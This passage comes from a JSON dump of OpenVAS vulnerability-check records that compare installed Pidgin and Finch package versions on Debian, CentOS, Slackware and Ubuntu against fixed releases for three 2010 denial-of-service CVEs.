rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch-dev\", ver:\"2.4.3-4lenny8\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dev\", ver:\"2.4.3-4lenny8\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dbg\", ver:\"2.4.3-4lenny8\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch\", ver:\"2.4.3-4lenny8\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin\", ver:\"2.4.3-4lenny8\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple0\", ver:\"2.4.3-4lenny8\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-12-21T11:32:53", "references": ["2010:0115", "http://lists.centos.org/pipermail/centos-announce/2010-February/016511.html"], "pluginID": "1361412562310880370", "description": "Check for the Version of finch", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-02-22T00:00:00", "type": "openvas", "title": "CentOS Update for finch CESA-2010:0115 centos4 i386", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2017-12-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880370", "id": "OPENVAS:1361412562310880370", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for finch CESA-2010:0115 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Pidgin is an instant messaging program which can log in to multiple\n accounts on multiple instant messaging networks simultaneously.\n\n An input sanitization flaw was found in the way Pidgin's MSN protocol\n implementation handled MSNSLP invitations. A remote attacker could send a\n specially-crafted INVITE request that would cause a denial of service\n (memory corruption and Pidgin crash). (CVE-2010-0277)\n \n A denial of service flaw was found in Finch's XMPP chat implementation,\n when using multi-user chat. If a Finch user in a multi-user chat session\n were to change their nickname to contain the HTML &quot;br&quot; element, it would\n cause Finch to crash. (CVE-2010-0420)\n \n Red Hat would like to thank Sadrul Habib Chowdhury of the Pidgin project\n for responsibly reporting the CVE-2010-0420 issue.\n \n A denial of service flaw was found in the way Pidgin processed emoticon\n images. A remote attacker could flood the victim with emoticon images\n during mutual communication, leading to excessive CPU use. (CVE-2010-0423)\n \n These packages upgrade Pidgin to version 2.6.6. Refer to the Pidgin release\n notes for a full list of changes: <a rel= &qt nofollow &qt href= &qt http://developer.pidgin.im/wiki/ChangeLog &qt >http://developer.pidgin.im/wiki/ChangeLog</a>\n \n All Pidgin users are advised to upgrade to these updated packages, which\n correct these issues. Pidgin must be restarted for this update to take\n effect.\";\n\ntag_affected = \"finch on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-February/016511.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880370\");\n script_version(\"$Revision: 8187 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 08:30:09 +0100 (Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-22 13:38:33 +0100 (Mon, 22 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"CESA\", value: \"2010:0115\");\n script_cve_id(\"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n script_name(\"CentOS Update for finch CESA-2010:0115 centos4 i386\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of finch\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.6.6~1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"finch-devel\", rpm:\"finch-devel~2.6.6~1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpurple\", rpm:\"libpurple~2.6.6~1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.6.6~1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpurple-perl\", rpm:\"libpurple-perl~2.6.6~1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpurple-tcl\", rpm:\"libpurple-tcl~2.6.6~1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.6.6~1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pidgin-devel\", rpm:\"pidgin-devel~2.6.6~1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.6.6~1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-12-12T11:11:02", "references": ["2010:0115", "http://lists.centos.org/pipermail/centos-announce/2010-February/016511.html"], "pluginID": "880370", "description": "Check for the Version of finch", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-02-22T00:00:00", "title": "CentOS Update for finch CESA-2010:0115 centos4 i386", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2017-12-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880370", "id": "OPENVAS:880370", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for finch CESA-2010:0115 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Pidgin is an instant messaging program which can log in to multiple\n accounts on multiple instant messaging networks simultaneously.\n\n An input sanitization flaw was found in the way Pidgin's MSN protocol\n implementation handled MSNSLP invitations. A remote attacker could send a\n specially-crafted INVITE request that would cause a denial of service\n (memory corruption and Pidgin crash). (CVE-2010-0277)\n \n A denial of service flaw was found in Finch's XMPP chat implementation,\n when using multi-user chat. If a Finch user in a multi-user chat session\n were to change their nickname to contain the HTML &quot;br&quot; element, it would\n cause Finch to crash. (CVE-2010-0420)\n \n Red Hat would like to thank Sadrul Habib Chowdhury of the Pidgin project\n for responsibly reporting the CVE-2010-0420 issue.\n \n A denial of service flaw was found in the way Pidgin processed emoticon\n images. A remote attacker could flood the victim with emoticon images\n during mutual communication, leading to excessive CPU use. (CVE-2010-0423)\n \n These packages upgrade Pidgin to version 2.6.6. Refer to the Pidgin release\n notes for a full list of changes: <a rel= &qt nofollow &qt href= &qt http://developer.pidgin.im/wiki/ChangeLog &qt >http://developer.pidgin.im/wiki/ChangeLog</a>\n \n All Pidgin users are advised to upgrade to these updated packages, which\n correct these issues. Pidgin must be restarted for this update to take\n effect.\";\n\ntag_affected = \"finch on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-February/016511.html\");\n script_id(880370);\n script_version(\"$Revision: 8068 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-11 07:31:34 +0100 (Mon, 11 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-22 13:38:33 +0100 (Mon, 22 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"CESA\", value: \"2010:0115\");\n script_cve_id(\"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n script_name(\"CentOS Update for finch CESA-2010:0115 centos4 i386\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of finch\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.6.6~1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"finch-devel\", rpm:\"finch-devel~2.6.6~1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpurple\", rpm:\"libpurple~2.6.6~1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.6.6~1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpurple-perl\", rpm:\"libpurple-perl~2.6.6~1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpurple-tcl\", rpm:\"libpurple-tcl~2.6.6~1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.6.6~1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pidgin-devel\", rpm:\"pidgin-devel~2.6.6~1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.6.6~1.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:19:28", "references": [], "pluginID": "136141256231067044", "description": "The remote host is missing an update as announced\nvia advisory SSA:2010-069-01.", "edition": 1, "reporter": "Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com", "published": "2012-09-11T00:00:00", "title": "Slackware Advisory SSA:2010-069-01 pidgin ", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Slackware Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231067044", "id": "OPENVAS:136141256231067044", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2010_069_01.nasl 9352 2018-04-06 07:13:02Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New pidgin packages are available for Slackware 12.0, 12.1, 12.2, 13.0,\nand -current to fix denial of service issues.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2010-069-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2010-069-01\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.67044\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:13:02 +0200 (Fri, 06 Apr 2018) $\");\n script_cve_id(\"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"$Revision: 9352 $\");\n script_name(\"Slackware Advisory SSA:2010-069-01 pidgin \");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"pidgin\", ver:\"2.6.6-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"pidgin\", ver:\"2.6.6-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"pidgin\", ver:\"2.6.6-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"pidgin\", ver:\"2.6.6-i486-1_slack13.0\", rls:\"SLK13.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:53:57", "references": ["902-1", "http://www.ubuntu.com/usn/usn-902-1/"], "pluginID": "1361412562310840393", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-902-1", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-03-02T00:00:00", "type": "openvas", "title": "Ubuntu Update for pidgin vulnerabilities USN-902-1", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2017-12-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840393", "id": "OPENVAS:1361412562310840393", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_902_1.nasl 8250 2017-12-27 07:29:15Z teissa $\n#\n# Ubuntu Update for pidgin vulnerabilities USN-902-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Fabian Yamaguchi discovered that Pidgin incorrectly validated all fields of\n an incoming message in the MSN protocol handler. A remote attacker could\n send a specially crafted message and cause Pidgin to crash, leading to a\n denial of service. (CVE-2010-0277)\n\n Sadrul Habib Chowdhury discovered that Pidgin incorrectly handled certain\n nicknames in Finch group chat rooms. A remote attacker could use a\n specially crafted nickname and cause Pidgin to crash, leading to a denial\n of service. (CVE-2010-0420)\n \n Antti Hayrynen discovered that Pidgin incorrectly handled large numbers of\n smileys. A remote attacker could send a specially crafted message and cause\n Pidgin to become unresponsive, leading to a denial of service.\n (CVE-2010-0423)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-902-1\";\ntag_affected = \"pidgin vulnerabilities on Ubuntu 8.04 LTS ,\n Ubuntu 8.10 ,\n Ubuntu 9.04 ,\n Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-902-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840393\");\n script_version(\"$Revision: 8250 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 08:29:15 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:46:47 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"USN\", value: \"902-1\");\n script_cve_id(\"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n script_name(\"Ubuntu Update for pidgin vulnerabilities USN-902-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"finch\", ver:\"2.5.5-1ubuntu8.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpurple0\", ver:\"2.5.5-1ubuntu8.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pidgin-dbg\", ver:\"2.5.5-1ubuntu8.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pidgin\", ver:\"2.5.5-1ubuntu8.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"finch-dev\", ver:\"2.5.5-1ubuntu8.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpurple-bin\", ver:\"2.5.5-1ubuntu8.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpurple-dev\", ver:\"2.5.5-1ubuntu8.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pidgin-data\", ver:\"2.5.5-1ubuntu8.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pidgin-dev\", ver:\"2.5.5-1ubuntu8.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"finch\", ver:\"2.5.2-0ubuntu1.7\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpurple0\", ver:\"2.5.2-0ubuntu1.7\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pidgin-dbg\", ver:\"2.5.2-0ubuntu1.7\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pidgin\", ver:\"2.5.2-0ubuntu1.7\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"finch-dev\", ver:\"2.5.2-0ubuntu1.7\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpurple-bin\", ver:\"2.5.2-0ubuntu1.7\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpurple-dev\", ver:\"2.5.2-0ubuntu1.7\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pidgin-data\", ver:\"2.5.2-0ubuntu1.7\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pidgin-dev\", ver:\"2.5.2-0ubuntu1.7\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"finch\", ver:\"2.4.1-1ubuntu2.9\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpurple0\", ver:\"2.4.1-1ubuntu2.9\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pidgin-dbg\", ver:\"2.4.1-1ubuntu2.9\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pidgin\", ver:\"2.4.1-1ubuntu2.9\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"finch-dev\", ver:\"2.4.1-1ubuntu2.9\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpurple-bin\", ver:\"2.4.1-1ubuntu2.9\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpurple-dev\", ver:\"2.4.1-1ubuntu2.9\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pidgin-data\", ver:\"2.4.1-1ubuntu2.9\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pidgin-dev\", ver:\"2.4.1-1ubuntu2.9\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"gaim\", ver:\"2.4.1-1ubuntu2.9\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"finch\", ver:\"2.6.2-1ubuntu7.2\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpurple0\", ver:\"2.6.2-1ubuntu7.2\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pidgin-dbg\", ver:\"2.6.2-1ubuntu7.2\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pidgin\", ver:\"2.6.2-1ubuntu7.2\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"finch-dev\", ver:\"2.6.2-1ubuntu7.2\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpurple-bin\", ver:\"2.6.2-1ubuntu7.2\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpurple-dev\", ver:\"2.6.2-1ubuntu7.2\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pidgin-data\", ver:\"2.6.2-1ubuntu7.2\", rls:\"UBUNTU9.10\")) != NULL)\n {\n 